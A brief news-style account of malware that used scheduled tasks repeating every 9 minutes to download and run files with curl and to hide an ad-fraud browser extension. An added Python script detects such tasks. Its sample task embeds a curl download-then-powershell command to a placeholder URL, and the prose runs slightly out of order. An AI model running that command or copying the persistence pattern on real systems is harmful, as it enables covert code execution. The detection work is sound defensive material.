The tasks were set to run every 9 minutes after a user logged into their account. The most concerning pair of tasks created would use curl to download files from the original website that delivered the malicious script, and then execute whatever it downloaded.

A separate scheduled task, set to run every 9 minutes, would then restart the browser and extension. Even if you noticed your system acting a bit laggy and went to check for a problem, you wouldn't find one.

For example, one would monitor the active tasks on a PC and kill the browser and extension being used for ad fraud any time Task Manager was opened. The scheduled tasks also ran a handful of other scripts that served a few different purposes.

At this time, the group that discovered the malware thinks the primary purpose of the extension was ad fraud, rather than anything more sinister. The browser extension was then run in a "headless" browser window in the background, effectively hiding it from the user.
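For defenders, the task pattern described above (a logon trigger that repeats every few minutes and an action that uses curl to fetch and then run a file) can be checked in the XML that `schtasks /query /xml` exports. The following is an added example, not code from the original article or the researchers; the sample task, the placeholder URL and the 15-minute threshold are assumptions made for illustration.

```python
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
MAX_MINUTES = 15  # assumed threshold; the tasks described above repeated every 9 minutes

# Constructed sample task export; the URL and file name are placeholders.
SAMPLE_TASK = r"""<?xml version="1.0"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <LogonTrigger>
      <Repetition><Interval>PT9M</Interval></Repetition>
    </LogonTrigger>
  </Triggers>
  <Actions>
    <Exec>
      <Command>cmd.exe</Command>
      <Arguments>/c curl -s -o %TEMP%\p.ps1 https://example.invalid/p &amp; powershell -File %TEMP%\p.ps1</Arguments>
    </Exec>
  </Actions>
</Task>"""


def interval_minutes(iso):
    """Convert an ISO 8601 duration such as PT9M or PT1H30M to minutes."""
    m = re.fullmatch(r"P(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?", iso.strip())
    if not m:
        return None
    days, hours, mins, secs = (int(x or 0) for x in m.groups())
    return days * 1440 + hours * 60 + mins + secs / 60


def assess_task(xml_text):
    """Return the reasons a task definition resembles the persistence described above."""
    # Drop the XML declaration so exports that declare UTF-16 still parse from a str.
    root = ET.fromstring(re.sub(r"^\s*<\?xml[^>]*\?>", "", xml_text))
    findings = []
    for trigger in root.findall("t:Triggers/t:LogonTrigger", NS):
        minutes = interval_minutes(trigger.findtext("t:Repetition/t:Interval", "", NS))
        if minutes and minutes <= MAX_MINUTES:
            findings.append(f"logon trigger repeating every {minutes:g} min")
    for action in root.findall("t:Actions/t:Exec", NS):
        cmdline = f'{action.findtext("t:Command", "", NS)} {action.findtext("t:Arguments", "", NS)}'
        # curl followed by a chained command is the download-then-execute shape.
        if re.search(r"\bcurl(\.exe)?\b.*(&|\||;)", cmdline, re.I | re.S):
            findings.append("curl download chained to another command")
    return findings


if __name__ == "__main__":
    print(assess_task(SAMPLE_TASK))
```

Either finding alone can occur in legitimate software; a task that produces both is the combination worth reviewing first.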